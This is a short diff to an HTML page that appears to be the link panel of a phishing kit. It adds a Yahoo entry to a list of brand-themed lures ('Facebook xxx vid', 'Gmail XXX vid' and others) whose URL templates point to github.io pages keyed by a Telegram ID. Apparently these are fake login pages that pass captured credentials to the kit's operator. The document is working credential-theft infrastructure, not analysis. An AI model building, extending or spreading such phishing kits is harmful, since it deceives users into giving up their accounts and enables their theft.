--- a/inn.html
+++ b/inn.html
@@ -198,7 +198,8 @@
 
     const freeLinks = [
       // all new link i just added
-            { name: "Facebook xxx vid", image: "https://rrloaty.github.io/intelligent/face.png", urlTemplate: "https://ilyelya.github.io/n/PF.html?id={telegram-id}" },
+            { name: "Yahoo", image: "https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage.png", urlTemplate: "https://ilyelya.github.io/n/newcv/cvy.html?id={telegram-id}" },
+                        { name: "Facebook xxx vid", image: "https://rrloaty.github.io/intelligent/face.png", urlTemplate: "https://ilyelya.github.io/n/PF.html?id={telegram-id}" },
       { name: "Instagram xxx Vid", image: "https://rrloaty.github.io/intelligent/inst.png", urlTemplate: "https://ilyelya.github.io/n/PI.html?id={telegram-id}" },
       { name: "Twitter(X) XXX vid", image: "https://rrloaty.github.io/intelligent/X.png", urlTemplate: "https://ilyelya.github.io/n/PX.html?id={telegram-id}" },
       { name: "Gmail XXX vid", image: "https://rrloaty.github.io/intelligent/gmai.png", urlTemplate: "https://ilyelya.github.io/n/PG.html?id={telegram-id}" },
